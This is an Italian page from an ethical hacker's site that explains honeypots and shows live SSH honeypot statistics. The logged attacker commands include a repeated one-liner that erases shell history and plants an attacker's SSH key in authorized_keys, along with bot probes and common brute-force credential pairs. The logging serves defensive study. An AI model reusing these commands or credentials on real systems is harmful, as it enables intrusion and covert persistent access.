ENG ITA

# Ethical Hacker & ICT Security Specialist

Honeypot

In informatica, una honeypot (letteralmente: "barattolo di miele") è un sistema o componente hardware/software usato come esca al fine di studiare ed analizzare gli attacchi informatici in tempo reale.

Solitamente consiste in uno o più siti o servizi che sembrano essere parte della rete e che contengono informazioni preziose per un attaccante, ma che in realtà sono ben isolati e non contegono dati reali, ma forniscono a chi li amministra tutti i dettagli degli attacchi informatici subiti.

Il valore primario di una honeypot è quindi l'informazione che essa dà sulla natura e la frequenza di eventuali attacchi subiti.

Se sei curioso di scoprire questo mondo, guarda le statistiche degli attacchi in tempo reale che ora dopo ora vengono rilevati dalla mia rete di honeypot:

Dizionari live

E' possibile scaricare dizionari di password, nomi utente e coppie user/pass estrapolati dagli attacchi verso il servizio SSH:

Tutte le statistiche della honeypot di seguito:

SSH

×
Last 50 commands executed
DateCommandSource
2019-05-21 00:43:54 cat /bin/echo ;/gisdfoewrsfdf185.234.217.217 Ireland
2019-05-21 00:43:54/gisdfoewrsfdf185.234.217.217 Ireland
2019-05-21 00:43:54185.234.217.217 Ireland
2019-05-21 00:43:53 echo -e '\\x47\\x72\\x6f\\x70/sys' > /sys/.nippon; cat /sys/.nippon; rm -f /sys/.nippon185.234.217.217 Ireland
2019-05-21 00:43:53185.234.217.217 Ireland
2019-05-21 00:43:53 echo -e '\\x47\\x72\\x6f\\x70/dev' > /dev/.nippon; cat /dev/.nippon; rm -f /dev/.nippon185.234.217.217 Ireland
2019-05-21 00:43:53185.234.217.217 Ireland
2019-05-21 00:43:53 echo -e '\\x47\\x72\\x6f\\x70/dev/shm' > /dev/shm/.nippon; cat /dev/shm/.nippon; rm -f /dev/shm/.nippon185.234.217.217 Ireland
2019-05-21 00:43:53185.234.217.217 Ireland
2019-05-21 00:43:53 echo -e '\\x47\\x72\\x6f\\x70/dev/pts' > /dev/pts/.nippon; cat /dev/pts/.nippon; rm -f /dev/pts/.nippon185.234.217.217 Ireland
2019-05-21 00:43:53185.234.217.217 Ireland
2019-05-21 00:43:53/gisdfoewrsfdf185.234.217.217 Ireland
2019-05-21 00:43:53/gisdfoewrsfdf185.234.217.217 Ireland
2019-05-21 00:43:53185.234.217.217 Ireland
2019-05-21 00:43:52 echo -e '\\x47\\x72\\x6f\\x70/' > //.nippon; cat //.nippon; rm -f //.nippon185.234.217.217 Ireland
2019-05-21 00:43:52185.234.217.217 Ireland
2019-05-21 00:43:52 echo -e '\\x47\\x72\\x6f\\x70/tmp' > /tmp/.nippon; cat /tmp/.nippon; rm -f /tmp/.nippon185.234.217.217 Ireland
2019-05-21 00:43:52185.234.217.217 Ireland
2019-05-21 00:43:52 echo -e '\\x47\\x72\\x6f\\x70/var/tmp' > /var/tmp/.nippon; cat /var/tmp/.nippon; rm -f /var/tmp/.nippon185.234.217.217 Ireland
2019-05-21 00:43:52185.234.217.217 Ireland
2019-05-21 00:43:52 echo -e '\\x47\\x72\\x6f\\x70/' > //.nippon; cat //.nippon; rm -f //.nippon185.234.217.217 Ireland
2019-05-21 00:43:52185.234.217.217 Ireland
2019-05-21 00:43:52 echo -e '\\x47\\x72\\x6f\\x70/lib/init/rw' > /lib/init/rw/.nippon; cat /lib/init/rw/.nippon; rm -f /lib/init/rw/.nippon185.234.217.217 Ireland
2019-05-21 00:43:52185.234.217.217 Ireland
2019-05-21 00:43:52 echo -e '\\x47\\x72\\x6f\\x70/proc' > /proc/.nippon; cat /proc/.nippon; rm -f /proc/.nippon185.234.217.217 Ireland
2019-05-21 00:43:52185.234.217.217 Ireland
2019-05-21 00:43:51/gisdfoewrsfdf185.234.217.217 Ireland
2019-05-21 00:43:51/gisdfoewrsfdf185.234.217.217 Ireland
2019-05-21 00:43:51185.234.217.217 Ireland
2019-05-21 00:43:51/bin/busybox cp; /gisdfoewrsfdf185.234.217.217 Ireland
2019-05-21 00:43:51/gisdfoewrsfdf185.234.217.217 Ireland
2019-05-21 00:43:51185.234.217.217 Ireland
2019-05-21 00:43:51 mount ;/gisdfoewrsfdf185.234.217.217 Ireland
2019-05-21 00:43:51/gisdfoewrsfdf185.234.217.217 Ireland
2019-05-21 00:43:51185.234.217.217 Ireland
2019-05-21 00:25:20uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd45.55.157.147 United States
2019-05-20 23:58:41uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd51.75.169.236 France
2019-05-20 23:31:04uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd54.37.205.20 France
2019-05-20 23:07:30uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd115.254.63.52 India
2019-05-20 22:34:08uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd206.189.188.223 United States
2019-05-20 21:10:18uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd139.59.14.210 India
2019-05-20 20:47:52uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd106.13.74.47 China
2019-05-20 18:54:25uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd109.86.81.197 Ukraine
2019-05-20 18:06:16uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd206.189.197.48 United States
2019-05-20 17:10:40uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd104.238.81.58 United States
2019-05-20 16:58:04uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd180.167.198.186 China
2019-05-20 15:40:23cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'116.204.132.138 China
2019-05-20 15:40:23cat /proc/cpuinfo | grep name | head -n 1 | awk {print $4,$5,$6,$7,$8,$9;}116.204.132.138 China
2019-05-20 15:40:10cat /var/tmp/.var03522123 | head -n 1116.204.132.138 China
2019-05-20 15:39:11rm -rf /var/tmp/.var03522123116.204.132.138 China
×
Last 20 sessions
DateSource
2019-05-21 03:00:14185.220.221.223 Czech Republic
2019-05-21 03:00:115.188.87.53 Russian Federation
2019-05-21 03:00:115.188.86.198 Ireland
2019-05-21 03:00:085.188.87.53 Russian Federation
2019-05-21 03:00:01185.220.221.203 Czech Republic
2019-05-21 03:00:005.188.86.196 Ireland
2019-05-21 02:59:595.188.86.207 Ireland
2019-05-21 02:59:455.188.86.195 Ireland
2019-05-21 02:59:415.188.86.211 Ireland
2019-05-21 02:59:415.188.86.206 Ireland
2019-05-21 02:59:395.188.87.54 Russian Federation
2019-05-21 02:59:265.188.86.164 Ireland
2019-05-21 02:59:115.188.86.198 Ireland
2019-05-21 02:59:015.188.86.210 Ireland
2019-05-21 02:58:595.188.87.53 Russian Federation
2019-05-21 02:58:565.188.87.55 Russian Federation
2019-05-21 02:58:555.188.87.55 Russian Federation
2019-05-21 02:58:515.188.86.207 Ireland
2019-05-21 02:58:51185.220.221.203 Czech Republic
2019-05-21 02:58:455.188.87.54 Russian Federation
×
TOP 15 USER+PASS
CountUsernamePassword
984327 adminadmin123
13788 rootchangeme
4668 admin
2349 adminaerohive
1309 ubntubnt
965 adminadmin
648 111111admin
646 adm12345678
536 supportsupport
438 rootadmin
436 root!@
425 piraspberry
406 useruser
397 serviceservice
377 usuariousuario
×
TOP 20 SUCCESSFUL LOGIN IPs
CountSource
425195.188.86.211 Ireland
371225.188.86.174 Ireland
32919185.220.221.223 Czech Republic
31270185.220.221.203 Czech Republic
29841185.220.221.222 Czech Republic
2959088.214.26.94
2925688.214.26.88
292415.188.87.55 Russian Federation
2839488.214.26.89
282575.188.87.49 Russian Federation
279985.188.87.53 Russian Federation
275985.188.87.51 Russian Federation
273565.188.87.54 Russian Federation
271085.188.87.52 Russian Federation
270165.188.86.169 Ireland
266905.188.86.194 Ireland
266755.188.86.208 Ireland
266215.188.86.170 Ireland
263015.188.86.167 Ireland
258405.188.86.165 Ireland
×
TOP 20 attackers
ConnectionsSource
431715.188.86.211 Ireland
372405.188.86.174 Ireland
33380185.220.221.223 Czech Republic
31585185.220.221.203 Czech Republic
3058388.214.26.88
30451185.220.221.222 Czech Republic
297135.188.87.55 Russian Federation
2959188.214.26.94
2940588.214.26.89
286985.188.87.49 Russian Federation
284365.188.87.53 Russian Federation
282825.188.87.51 Russian Federation
278425.188.87.54 Russian Federation
276905.188.87.52 Russian Federation
274425.188.86.169 Ireland
272115.188.86.208 Ireland
269475.188.86.170 Ireland
269025.188.86.194 Ireland
267855.188.86.167 Ireland
263035.188.86.210 Ireland

Se vuoi guardare il codice che genera questa pagina, vai al sito del mio progetto HoneyStats! (github)

Vuoi ancora di più? Seguimi all'interno del laboratorio!